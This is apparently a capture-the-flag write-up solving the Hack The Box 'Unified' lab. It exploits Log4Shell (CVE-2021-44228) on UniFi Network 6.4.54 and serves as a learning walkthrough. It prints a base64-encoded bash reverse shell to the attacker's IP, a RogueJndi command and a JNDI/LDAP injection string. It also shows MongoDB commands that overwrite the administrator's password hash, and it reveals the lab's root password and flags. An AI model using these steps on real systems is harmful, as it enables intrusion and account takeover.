Hack The Box - Unified

This article discusses the solution for Hack the Box Unified Challenge tasks so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Unified Solution

Which are the first four open ports?

1. Run the following to discover open ports:

    nmap -sV  {target_ip)
   

   

Answer: 22,6789,8080,8443

What is the title of the software that is running running on port 8443?

1. We know from the previous section that 8443 is an ssl service. We know that port 8080 is http service. Lets first checkout {target_ip}:8080 in our browser. This redirects to a website https://{target_ip}:8443/manage/account/login?redirect=%2Fmanage

2. According to the hint we need to look at the title. So we inspect the website in our browser and see that the find that in the head tag we find a title tag containing UniFi Network

Answer: UniFi Network

What is the version of the software that is running?

1. Looking at the website we were redirected to we find the version.

   

Answer: 6.4.54

What is the CVE for the identified vulnerability?

Hint : Look for UniFi vulnerabilities in 2021

1. Just do a google search for unifi network version 6.4.54 cve

Answer: CVE-2021-44228

What protocol does JNDI leverage in the injection?

1. We can just read the details of CVE that we found https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Answer: LDAP

What tool do we use to intercept the traffic, indicating the attack was successful?

Hint: Not wireshark

1. Let's just do a lookup for alternative software to wireshark

Answer: tcpdump

What port do we need to inspect intercepted traffic for?

Hint: Default port for LDAP

1. Let's do a lookup for default LDAP port

Answer: 389

What port is the MongoDB service running on?

Hint: Check the running processes on the system

This will convert the reverse shell payload to base64. echo 'bash -c bash -i >&/dev/tcp/{Your IP Address}/{A port of your choice} 0>&1' | base64

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 STRING HERE}|{base64,-d}|{bash,-i}" --hostname "{YOUR TUN0 IP ADDRESS}"

open new terminal netcat listener

nc -lvp 4444

Go back to burp and edit the remember ${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat}

We now have a shell in our netcat listener now let's upgrade it

now let's upgrade it into a bash shell

script /dev/null -c bash

What port is the MongoDB service running on?

1. Let's list down all the services in our target by running the command ps aux | grep mongo

   

Answer: 27117

What is the default database name for UniFi applications?

Hint: Connect to Mongo and list the databases

1. Let's connect to mongo runningin port 27117

    mongo --port 27117
   

2. Let's list all databases show dbs

Answer: ace

What is the function we use to enumerate users within the database in MongoDB?

Hint: Search for "find items in mongo" in Google

1. Upon our google search we find db.admin.find()

Answer: db.admin.find()

What is the function we use to update users within the database in MongoDB?

Hint: Search for "update items in mongo" in Google

Answer:db.admin.update()

What is the password for the root user?

1. Now we have access to mongodb let's enumerate all the users in the unify's ace database to see if there an interesting user. The forEach here beautifies the output to a readable json.

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

OR

use ace
db.admin.find().forEach(printjson);

2. We have found a hash in the key x_shadow which represents the password $6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.

3. From the hash the value $6$ gives away that it is sha-512. There is no quick way or tools to crack this hash. So we can attempt to create our own and update the administrator's password.

4. Let's create our own hash

    mkpasswd -m sha-512 Password1234
   

$6$DxHn0.Rx4LOznIAe$7YW85uGrCz.DvLORVa0jSDsn6ecADE3sVSH.i0lNpg19y30b83NfOSlpaii2cpbQWkwmxgP31OeZEnS2l5nvI0

5. Now let's update the administrator's password

use ace
db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$DxHn0.Rx4LOznIAe$7YW85uGrCz.DvLORVa0jSDsn6ecADE3sVSH.i0lNpg19y30b83NfOSlpaii2cpbQWkwmxgP31OeZEnS2l5nvI0"}})

OR

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$DxHn0.Rx4LOznIAe$7YW85uGrCz.DvLORVa0jSDsn6ecADE3sVSH.i0lNpg19y30b83NfOSlpaii2cpbQWkwmxgP31OeZEnS2l5nvI0"}})'

6. Now let's go to the unifi website again and try the user administrator and the modified password Password1234

7. We now have logged in.

8. Navigate to settings to see if there is something interesting, in which we find out that SSH authentication can be enabled and root passowrd is viewable.

Answer: NotACrackablePassword4U2022

Submit user flag

1. Now let's try to connect via ssh. Open a new terminal and execute the following. (Use the password found in the settings)

ssh root@{target_ip_address}

2. We have succesfully connected and now have a shell with root privileges.

3. Let's look for user.txt file

find -type f -name "user.txt"

Answer: 6ced1a6a89e666c0620cdb10262ba127

Submit root flag

1. Let's look for root.txt file

find -type f -name "root.txt"

Answer: e50bc93c75b634e4b272d2f771c33681

Until next time. Keep learning.

Stay stoked and code. :)

---

I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)